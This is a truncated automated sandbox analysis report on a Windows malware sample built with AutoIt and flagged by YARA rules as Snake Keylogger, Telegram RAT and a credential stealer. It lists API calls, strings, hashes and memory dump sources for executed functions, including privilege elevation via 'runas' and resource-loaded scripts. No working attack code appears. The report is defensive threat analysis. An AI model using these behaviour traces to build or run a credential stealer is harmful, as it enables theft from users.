Commandline:	"C:\Users\user\AppData\Local\toggeries\savagenesses.exe"
Imagebase:	0x780000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2556948372.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2558253285.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:55:26
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 1492
Imagebase:	0xe90000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 009042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0090430D

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

GetCurrentProcess.KERNEL32(?,0099CB64,00000000,?,?), ref: 00904422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00904429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00904454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00904466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00904474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0090447B
GetSystemInfo.KERNEL32(?,?,?), ref: 009044A0

Strings

GetNativeSystemInfo, xrefs: 00904460
|O, xrefs: 009436F8
kernel32.dll, xrefs: 0090444F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 0a242e3896d7b33f959ca7459d38549d25ea9c252bf30a1fd1c78ec778645446
Instruction ID: d9f139568d381f9a6b691ec3614a27b1ef3929c05499fe3b0c95e57c641badab
Opcode Fuzzy Hash: 0a242e3896d7b33f959ca7459d38549d25ea9c252bf30a1fd1c78ec778645446
Instruction Fuzzy Hash: 3DA174B39AF2C0FFC711D779BD41595FFE96B26340B18889BE18193A72D2244584EB21

Function 009042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,009050AA,?,?,00000000,00000000), ref: 009042B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009050AA,?,?,00000000,00000000), ref: 009042C9
LoadResource.KERNEL32(?,00000000,?,?,009050AA,?,?,00000000,00000000,?,?,?,?,?,?,00904F20), ref: 009435BE
SizeofResource.KERNEL32(?,00000000,?,?,009050AA,?,?,00000000,00000000,?,?,?,?,?,?,00904F20), ref: 009435D3
LockResource.KERNEL32(009050AA,?,?,009050AA,?,?,00000000,00000000,?,?,?,?,?,?,00904F20,?), ref: 009435E6

Strings

SCRIPT, xrefs: 009042BF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8d25c54ee957a4b7adaf6cea691a1c084fd10bf9bee39caea955394b03050803
Instruction ID: af73767011c443e8954be3a5d5fbd319a5698f2c927c55a4063292fa929a7a60
Opcode Fuzzy Hash: 8d25c54ee957a4b7adaf6cea691a1c084fd10bf9bee39caea955394b03050803
Instruction Fuzzy Hash: 7F117CB0200700BFDB218B69DC48F277BBDEBC5B51F14816AB522D6290DB71D8009630

Function 00942BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00902B6B

Part of subcall function 00903A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009D1418,?,00902E7F,?,?,?,00000000), ref: 00903A78

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,009C2224), ref: 00942C10
ShellExecuteW.SHELL32(00000000,?,?,009C2224), ref: 00942C17

Strings

runas, xrefs: 00942C0B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a13feb6e712b79fd3f9ec6a4f49b9a6d933747774345dc71d2f19b5696d80b7b
Instruction ID: 5fd725352a4ed66a7600b5eccaf26dccc11af419f7cb794fa8168ec0b8af2630
Opcode Fuzzy Hash: a13feb6e712b79fd3f9ec6a4f49b9a6d933747774345dc71d2f19b5696d80b7b
Instruction Fuzzy Hash: DA11B1726083416EC714FF64DC96FBE77A8ABD2740F84942EF182521E3CF209A49D712

Function 0096DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00945222), ref: 0096DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0096DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0096DBEE
FindClose.KERNEL32(00000000), ref: 0096DBFA

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 185cff87c5e060962df1089c3f53fd340a8f68fae28eb7214d73618d6217c550
Instruction ID: 6fecd5cef9f1841f36fd120c9758d41a66ff0a5e620b877749910e2e116706c7
Opcode Fuzzy Hash: 185cff87c5e060962df1089c3f53fd340a8f68fae28eb7214d73618d6217c550
Instruction Fuzzy Hash: 0DF0E570C2A91857C220AB7CAC0D8AE376C9E01374B544703F8B6C20F0EBB99D94D6D9

Function 0090D730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0090D807
timeGetTime.WINMM ref: 0090DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090DB28
TranslateMessage.USER32(?), ref: 0090DB7B
DispatchMessageW.USER32(?), ref: 0090DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0090DB9F
Sleep.KERNEL32(0000000A), ref: 0090DBB1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 3dc47632484975cc605d07652f07a8cfa1318da0f9a0cb59df397b1817afdaf2
Instruction ID: 0f4e0a412c78c121132297216d652ef1a5c6c4ae1cf0ed3a89eae67cd82274fd
Opcode Fuzzy Hash: 3dc47632484975cc605d07652f07a8cfa1318da0f9a0cb59df397b1817afdaf2
Instruction Fuzzy Hash: 5A42077060A341DFD728CF65C844BAAB7E9BF86304F14891DF8A5872D1D774E888DB92

Function 00902CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00902D07
RegisterClassExW.USER32(00000030), ref: 00902D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00902D42
InitCommonControlsEx.COMCTL32(?), ref: 00902D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00902D6F
LoadIconW.USER32(000000A9), ref: 00902D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00902D94

Strings

AutoIt v3 GUI, xrefs: 00902D23
+, xrefs: 00902CF0
0, xrefs: 00902CE9
TaskbarCreated, xrefs: 00902D37

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9779741eefc2180fbf8d65dd34be886ef7e5143a23fd815cd1247a2af5e3649e
Instruction ID: 4acb310ecbb4970bfdb9d982f1ea2f8aed0aca4a40c0a862121f26b18a71da04
Opcode Fuzzy Hash: 9779741eefc2180fbf8d65dd34be886ef7e5143a23fd815cd1247a2af5e3649e
Instruction Fuzzy Hash: 8B21B4B6966318AFDB00DFA8ED59ADDBBB4FB08700F00411BE511A62A0D7B145849FA1

Function 0094065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0094039A: CreateFileW.KERNELBASE(00000000,00000000,?,00940704,?,?,00000000,?,00940704,00000000,0000000C), ref: 009403B7

GetLastError.KERNEL32 ref: 0094076F
__dosmaperr.LIBCMT ref: 00940776
GetFileType.KERNELBASE(00000000), ref: 00940782
GetLastError.KERNEL32 ref: 0094078C
__dosmaperr.LIBCMT ref: 00940795
CloseHandle.KERNEL32(00000000), ref: 009407B5
CloseHandle.KERNEL32(?), ref: 009408FF
GetLastError.KERNEL32 ref: 00940931
__dosmaperr.LIBCMT ref: 00940938

Strings

H, xrefs: 009408BD

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: c688346f84c75fbc3f91ba17f01fb38a2cdc76401badb9d3d334fceffc7d1be8
Instruction ID: 9fb3d2602e20581048eaf547c6d9f81501db7cb410a7ad7d5d1a705ede6e2255
Opcode Fuzzy Hash: c688346f84c75fbc3f91ba17f01fb38a2cdc76401badb9d3d334fceffc7d1be8
Instruction Fuzzy Hash: 00A13532A141048FDF19EF68DC52BAE3BB4EB8A320F24015EF915AB391D7359C12DB91

Function 0090344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00903A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009D1418,?,00902E7F,?,?,?,00000000), ref: 00903A78

Part of subcall function 00903357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00903379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0090356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0094318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009431CE
RegCloseKey.ADVAPI32(?), ref: 00943210
_wcslen.LIBCMT ref: 00943277
_wcslen.LIBCMT ref: 00943286

Strings

\, xrefs: 0094328C
Include, xrefs: 00943184, 009431C5
Software\AutoIt v3\AutoIt, xrefs: 00903560
\Include\, xrefs: 00903527

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: ae5e16d173e7faae364603855572d71750fb8c0e2d45757008fca5203322517f
Instruction ID: 094f0cce38028cd345852a3c590020f413f88f92b3288c107656eb1569641b4b
Opcode Fuzzy Hash: ae5e16d173e7faae364603855572d71750fb8c0e2d45757008fca5203322517f
Instruction Fuzzy Hash: 7371C1715593009FC714EF29EC81A9BFBE8FFA4B40F40452EF545971A0DB708A88DB61

Function 00902B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00902B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00902B9D
LoadIconW.USER32(00000063), ref: 00902BB3
LoadIconW.USER32(000000A4), ref: 00902BC5
LoadIconW.USER32(000000A2), ref: 00902BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00902BEF
RegisterClassExW.USER32(?), ref: 00902C40

Part of subcall function 00902CD4: GetSysColorBrush.USER32(0000000F), ref: 00902D07
Part of subcall function 00902CD4: RegisterClassExW.USER32(00000030), ref: 00902D31
Part of subcall function 00902CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00902D42
Part of subcall function 00902CD4: InitCommonControlsEx.COMCTL32(?), ref: 00902D5F
Part of subcall function 00902CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00902D6F
Part of subcall function 00902CD4: LoadIconW.USER32(000000A9), ref: 00902D85
Part of subcall function 00902CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00902D94

Strings

AutoIt v3, xrefs: 00902C2F
0, xrefs: 00902C0F
#, xrefs: 00902C16

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 323d99aba93387b932cee5e7d6e641557be13d5d7ba05ea5dbf26da44c403296
Instruction ID: d6638bc337637e14f864cb5d55ae21a5f5ad8f155b8ca4f509c4a2a455c821d2
Opcode Fuzzy Hash: 323d99aba93387b932cee5e7d6e641557be13d5d7ba05ea5dbf26da44c403296
Instruction Fuzzy Hash: C8211DB2E6A314BFDB109FD9EC55A99BFB4FB48B50F40411BE504A66A0D7B10580EF90

Function 00903170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0090316A,?,?), ref: 009031D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0090316A,?,?), ref: 00903204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00903227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0090316A,?,?), ref: 00903232
CreatePopupMenu.USER32 ref: 00903246
PostQuitMessage.USER32(00000000), ref: 00903267

Strings

TaskbarCreated, xrefs: 0090322D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 8389b09e7748cfb2f6babee18a3bd4af5bc6ebf57c817567d5bcbbcdcf0bcd96
Instruction ID: c1866a67159eb4ad77188cdf42bdde1f73b06d95258c8dc2d0d00b0c16060b93
Opcode Fuzzy Hash: 8389b09e7748cfb2f6babee18a3bd4af5bc6ebf57c817567d5bcbbcdcf0bcd96
Instruction Fuzzy Hash: 1A4139762AC204BFDF245BBC9D2DB793B5DEB49340F04C527F912862E1C7758A80A7A1

Function 00938D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78095c847f4c5ee4a87821a5a4cde29bbd73ee8e744cf61275c7ec69935689a0
Instruction ID: 5014f015f8429c4085604a5adda490d69fcc3e2b508a797014ddacbe8b1c7b00
Opcode Fuzzy Hash: 78095c847f4c5ee4a87821a5a4cde29bbd73ee8e744cf61275c7ec69935689a0
Instruction Fuzzy Hash: 2DC1F274904349AFCF15EFA8D841BAEBBB4AF4A310F144099F425A7392C7749941CF61

Function 017EF3E8 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 017EF42D

Memory Dump Source

Source File: 00000000.00000002.2075184348.00000000017EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ee000_YJwE2gTm02.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 85b9b82ea3f0ae825dc9b9f856b4338a1bc1ff74ceff59c7ed98cc8167e2f275
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 6451E875A50209FBEF24DFA4CC49FEEB7B8AF4C701F108554F61AEA180DA74A644CB64

Function 00902C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00902C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00902CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00901CAD,?), ref: 00902CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00901CAD,?), ref: 00902CCF

Strings

AutoIt v3, xrefs: 00902C89, 00902C8E, 00902C8F
edit, xrefs: 00902CAC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 722c6f069e767bb790832337f65509e2ecb0a3ceb57ed10d36bbf8046897c64d
Instruction ID: d191c05960e3c69162cb532b0fa9d1aa7ac286b20e9306b024dded2a99b2dd29
Opcode Fuzzy Hash: 722c6f069e767bb790832337f65509e2ecb0a3ceb57ed10d36bbf8046897c64d
Instruction Fuzzy Hash: 92F0DAB66A52907BEB31171BAC08E77AFBDD7C6F50B00005BF904A25A0C6611890EAB0

Function 00972947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00972C05
DeleteFileW.KERNEL32(?), ref: 00972C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00972C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00972CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00972CC0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 84822beb12cce5b69ebfcff58b2790e517579b780d58d7afd8143fe743028b2a
Instruction ID: fa58f69b451107235efdabaec671dd9a314d7992af0542bc68206fb4e35d3f34
Opcode Fuzzy Hash: 84822beb12cce5b69ebfcff58b2790e517579b780d58d7afd8143fe743028b2a
Instruction Fuzzy Hash: 3AB13C72D10129ABDF25DFA4CC85FDEB7BDEF89350F1080A6F509E6185EA309A448F61

Function 017F0EB8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017F0DA8: Sleep.KERNELBASE(000001F4), ref: 017F0DB9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017F0FEF

Strings

TBU2RCBTUXXT1M63T, xrefs: 017F106F, 017F1072

Memory Dump Source

